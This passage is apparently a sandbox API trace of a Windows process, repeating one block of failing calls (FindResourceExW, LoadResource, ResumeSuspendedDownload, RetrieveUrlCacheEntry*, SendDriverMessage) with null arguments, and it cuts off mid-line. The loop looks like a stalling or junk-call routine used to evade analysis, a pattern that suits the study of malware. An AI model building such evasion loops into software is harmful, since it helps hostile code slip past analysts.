GetUserDefaultLangID () returned 0x409 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.653] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.653] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.653] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.653] GetUserDefaultLangID () returned 0x409 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.653] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.653] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.653] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.653] GetUserDefaultLangID () returned 0x409 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.653] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.653] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.653] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.653] GetUserDefaultLangID () returned 0x409 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.653] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.653] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.653] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.653] GetUserDefaultLangID () returned 0x409 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.653] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.653] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.653] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.653] GetUserDefaultLangID () returned 0x409 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.653] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.653] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.653] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.653] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.654] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.654] GetUserDefaultLangID () returned 0x409 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.654] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.654] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.654] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.654] GetUserDefaultLangID () returned 0x409 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.654] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.654] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.654] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.654] GetUserDefaultLangID () returned 0x409 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.654] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.654] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.654] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.654] GetUserDefaultLangID () returned 0x409 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.654] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.654] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.654] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.654] GetUserDefaultLangID () returned 0x409 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.654] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.654] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.654] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.654] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.654] GetUserDefaultLangID () returned 0x409 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.654] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.654] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.655] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.655] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.655] GetUserDefaultLangID () returned 0x409 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.655] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.655] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.655] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.655] GetUserDefaultLangID () returned 0x409 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.655] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.655] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.655] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.655] GetUserDefaultLangID () returned 0x409 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.655] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.655] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.655] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.655] GetUserDefaultLangID () returned 0x409 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.655] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.655] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.655] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.655] GetUserDefaultLangID () returned 0x409 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.655] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.655] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.655] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.655] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.655] GetUserDefaultLangID () returned 0x409 [0185.655] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.656] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.656] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.656] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.656] GetUserDefaultLangID () returned 0x409 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.656] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.656] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.656] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.656] GetUserDefaultLangID () returned 0x409 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.656] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.656] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.656] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.656] GetUserDefaultLangID () returned 0x409 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.656] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.656] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.656] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.656] GetUserDefaultLangID () returned 0x409 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.656] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.656] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.656] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.656] GetUserDefaultLangID () returned 0x409 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.656] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.656] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.656] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.656] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.657] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.657] GetUserDefaultLangID () returned 0x409 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.657] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.657] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.657] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.657] GetUserDefaultLangID () returned 0x409 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.657] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.657] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.657] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.657] GetUserDefaultLangID () returned 0x409 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.657] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.657] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.657] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.657] GetUserDefaultLangID () returned 0x409 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.657] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.657] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.657] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.657] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.657] SendDriverMessage 